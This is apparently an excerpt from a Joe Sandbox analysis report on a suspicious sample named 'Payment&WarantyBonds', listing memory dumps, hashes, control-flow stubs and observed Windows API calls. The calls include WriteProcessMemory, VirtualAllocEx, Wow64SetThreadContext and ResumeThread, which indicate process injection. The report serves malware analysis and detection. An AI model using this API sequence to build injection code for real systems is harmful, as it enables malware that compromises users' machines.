                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B1536E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B1536E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B1537C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B15353E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B1537C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B15353E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284D6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284D6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B153606
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B153606
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 07307798
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 07307798
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B155C6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B155C6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0284AFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e91314b61729c8a0a0c8eb6a7b8104cfc0365ab1914c10d3a210cefc564cf99
                                                                                                                                                                                • Instruction Fuzzy Hash: 0321AC75509380CFDB07CF24D994B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746357900.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_114d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction ID: b160a758ce4da79bbab485070fd574a85560b11df5ad06e236f037242c030c28
                                                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction Fuzzy Hash: 1911DF76404240CFDF06CF54D5C4B56BF71FB94324F28C2A9D9090B656C33AE45ACBA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746357900.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_114d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction ID: 860881ea4bc143e7a6725e948995106c3a6242169a98309e611ca338fb9b9d51
                                                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction Fuzzy Hash: D111CD72504280CFCF06CF54E5C4B16BF71FB94618F24C6A9D8090F256C336D45ACBA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746418593.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_115d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction ID: 702cc558e69e02af9da6f04b2ceb9aae354e6a98d068ee428a776ff7d62bf953
                                                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3811BB75504280DFDB06CF54D5C4B15BFA1FB84224F24C6AEDC494B296C33AD44ACB62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1162c5c3aa1ed00c4f68e9ddc1226f900007edeafcf3f69ba1cde0e2579758df
                                                                                                                                                                                • Instruction ID: f58a794a08127f3ea9d5e3cfbc1c76e5c3e26f01c0b6cf5123dfd185e3294852
                                                                                                                                                                                • Opcode Fuzzy Hash: 1162c5c3aa1ed00c4f68e9ddc1226f900007edeafcf3f69ba1cde0e2579758df
                                                                                                                                                                                • Instruction Fuzzy Hash: 14E1F775E042198FCB14DFA9C5809AEFBF2FF89305F248169E814AB356D731A941CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 27ed87e47ea79153cb096a7022a1e09bbffd828be073f5cb087dd52ef1f27c6a
                                                                                                                                                                                • Instruction ID: e44219bb78498d08bcac69b5a5e061a287c40b26d45bc5170115984c89315970
                                                                                                                                                                                • Opcode Fuzzy Hash: 27ed87e47ea79153cb096a7022a1e09bbffd828be073f5cb087dd52ef1f27c6a
                                                                                                                                                                                • Instruction Fuzzy Hash: E8E1E874E04219CFCB14DFA9C5849AEFBF2BF89305F248169E814AB35AD731A941CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8de9ea8e347fdb6284ecb60bd8c60358b6254c70a60985d9d91fb2d5d20b5237
                                                                                                                                                                                • Instruction ID: f3a069082109ebd3f52ef77351468cd5c41a787a6c5ffa97bda11d86628fcef5
                                                                                                                                                                                • Opcode Fuzzy Hash: 8de9ea8e347fdb6284ecb60bd8c60358b6254c70a60985d9d91fb2d5d20b5237
                                                                                                                                                                                • Instruction Fuzzy Hash: 2EE1E774E04219DFCB15DFA9C590AAEFBF2BF89305F248169E814AB356D730A941CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b42bd3ae425209241abceaf92ac22dcfda39e5d65e16ed3f130972264e15b85c
                                                                                                                                                                                • Instruction ID: c9f73d809be42192cd63405336dfe8f2d27291aa5b567803bc0d645f80f87d28
                                                                                                                                                                                • Opcode Fuzzy Hash: b42bd3ae425209241abceaf92ac22dcfda39e5d65e16ed3f130972264e15b85c
                                                                                                                                                                                • Instruction Fuzzy Hash: 59E1E975E04119CFCB14DFA9C5809AEFBF2BF89305F248169D814AB35AD731A941CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fe513456192b828fa9163425e474af235e4357925e701e5401b12d207066b4bd
                                                                                                                                                                                • Instruction ID: 21f3220a25b3318bb3dcf459d69dff760330be6463f5fbc5fff37bf21954a0f4
                                                                                                                                                                                • Opcode Fuzzy Hash: fe513456192b828fa9163425e474af235e4357925e701e5401b12d207066b4bd
                                                                                                                                                                                • Instruction Fuzzy Hash: A3E1E774E04119DFCB14DFA9C9849AEFBF2BF89305F248169E814AB356D731A942CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f0a1add83b83ac9a2030dbeee7b04be5a70bfee4572bfd3cb334ef27467480f
                                                                                                                                                                                • Instruction ID: 1313a36271948cbcd7e3bca64d79cf9a672b0c6785b442b38ea2ad08c7f45153
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f0a1add83b83ac9a2030dbeee7b04be5a70bfee4572bfd3cb334ef27467480f
                                                                                                                                                                                • Instruction Fuzzy Hash: DDE11CB4E102198FDB14DFA9C5949AEFBB2FF89304F248169E419AB355D730AD41CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 09192deecccfba61c99f13e9d4613421058455dae3d1bb10af3322385fe795b3
                                                                                                                                                                                • Instruction ID: ffefb7d5df11958679fb83c1083db04166673ae1a88a37e7106782683fe009c8

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:1.3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.5%
                                                                                                                                                                                Signature Coverage:3.1%
                                                                                                                                                                                Total number of Nodes:127
                                                                                                                                                                                Total number of Limit Nodes:8

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 176 417643-41766c call 42f103 179 417672-417680 call 42f703 176->179 180 41766e-417671 176->180 183 417690-4176a1 call 42dba3 179->183 184 417682-41768d call 42f9a3 179->184 189 4176a3-4176b7 LdrLoadDll 183->189 190 4176ba-4176bd 183->190 184->183 189->190
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                • Opcode ID: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction ID: 87064ee05c68f4dd1de749d9eca8b4b2b264888e6efa99d8a4d6e083abd2e19a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction Fuzzy Hash: B6015EB1E0420DABDB10EBE5DC42FDEB3789B54308F4041AAED0897241F635EB588B95

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 201 42c483-42c4bf call 404653 call 42d6c3 NtClose
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4BA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 218 14635c0-14635cc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 215 1462b60-1462b6c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 217 1462df0-1462dfc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 216 1462c70-1462c7c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 14 413ea5-413f03 16 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 14->16 17 413f07 call 42e5c3 14->17 26 413f83-413f88 16->26 27 413f63-413f74 PostThreadMessageW 16->27 17->16 27->26 28 413f76-413f80 27->28 28->26
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 29 413ef3-413f03 31 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 29->31 32 413f07 call 42e5c3 29->32 41 413f83-413f88 31->41 42 413f63-413f74 PostThreadMessageW 31->42 32->31 42->41 43 413f76-413f80 42->43 43->41
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 196 42c803-42c844 call 404653 call 42d6c3 RtlFreeHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,00416F27,000000F4), ref: 0042C83F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID:
